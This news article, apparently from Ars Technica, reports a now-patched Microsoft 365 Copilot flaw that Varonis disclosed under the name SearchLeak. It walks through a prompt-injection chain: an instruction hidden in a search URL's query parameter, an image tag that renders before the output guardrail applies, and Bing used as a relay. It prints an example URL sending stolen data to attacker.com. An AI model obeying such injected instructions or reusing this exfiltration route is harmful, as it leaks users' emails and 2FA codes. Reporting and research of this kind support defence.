Critical Copilot vulnerability allowed hackers to seal 2FA code from users - Ars Technica
Skip to content
AI
Biz & IT
Cars
Culture
Gaming
Health
Policy
Science
Security
Space
Tech
Forum
Subscribe
Story text
Size
Small<br>Standard<br>Large
Width
Standard<br>Wide
Links
Standard<br>Orange
* Subscribers only
Learn more
Pin to story
Theme
Search
Sign In
Sign in dialog...
Text<br>settings
Story text
Size
Small<br>Standard<br>Large
Width
Standard<br>Wide
Links
Standard<br>Orange
* Subscribers only
Learn more
Minimize to nav
Last Tuesday, Microsoft patched a vulnerability it rated as max critical in its M365 Copilot AI platform. On Monday, the researchers who discovered the vulnerability and reported it to Microsoft revealed how their proof-of-concept exploit could retrieve 2FA codes and other sensitive data from emails accessible to Copilot.
Microsoft and other LLM providers have been unable to prevent their products from complying with malicious requests to reveal data. The root cause: AI bots are unable to distinguish between instructions provided by users and those snuck into third-party content the models are summarizing, drafting responses to, or using to perform other actions on behalf of the user. With no way to secure this crucial boundary, Microsoft and its peers are left to erect complicated and ad hoc guardrails designed to rein in the consequences of this incurable gullibility.
Jumping over guardrails
One guardrail built into Copilot and most other LLMs prevents them from submitting web forms, sending emails, and taking similar actions that can be used to exfiltrate data from the user. To work around this, LLM hackers turned to markup language, which, among other things, allows users to add formatting elements such as headings, lists, and links to text without the need for HTML tags. Another workaround is to wrap sensitive data inside HTML tags such as and . In either case, a web request showing the data hits the attacker’s web server, where the secret information is captured in logs.
One Microsoft guardrail wraps Copilot output in blocks so the browser treats it as straight text. Another is to restrict the sites Copilot is permitted to visit without explicit approval. While Copilot has blanket permission to send requests to Microsoft domains, guardrails restrict requests to untrusted sites.
Security firm Varonis devised an exploit chain that was able to catapult over these guardrails. The first element was what the researchers call a Parameter-to-Prompt Injection. The parameter in this case is the q in a URL, which is used to flag a query that has been included. The Parameter-to-Prompt Injection is a close relative of the prompt injection. The difference is that the malicious command is located in the query parameter, rather than in an email or other piece of untrusted content.
To bring about the Parameter-to-Prompt Injection an attacker sends the target an email that contains the URL with the syntax https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=. The field contains an instruction. Copilot readily complied.
“The search functionality is exactly what attackers need, because even with limited capabilities, a user with access to critical information is enough,” the researchers wrote Monday. “To exfiltrate the data, an attacker crafts a URL that tells Copilot to ‘Search the user’s emails,’ extract the title, and embed it in an image URL.” The victim doesn’t type anything. They click a link, and Copilot does the rest.
Normally, the guardrail wrapping output in blocks would kick in. But the researchers discovered that the protection fires only after the “thinking” phase. Prior to that, Copilot generated its response using raw HTML, which is temporarily rendered in the browser DOM.
The researchers wrote:
So, the sequence looks like this:
Copilot starts streaming its response, which includes an tag
The browser sees the , renders it, and fires off an HTTP request to the src URL
Copilot finishes generating. The guardrail wraps everything in
Too late! The request already left.
The researchers now had an image request firing from the target’s browser. The problem, as noted earlier, is that Copilot won’t send image requests to most websites. To scale this guardrail, the exploit chain used Microsoft’s Bing search engine as a trampoline of sorts. Per the Copilot content security policy, Bing is among the sites permitted to send such requests. Bing would then send the request to the attacker-controlled domain that was included in the request. The request looked something like this:
https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/STOLEN_DATA/image.png
Varonis has named the attack SearchLeak.
“Since SearchLeak targets the Enterprise tier of Microsoft, the blast radius isn’t limited to personal data—it’s able to surface anything the user has access to inside the organization including emails, meeting invites and notes,” company...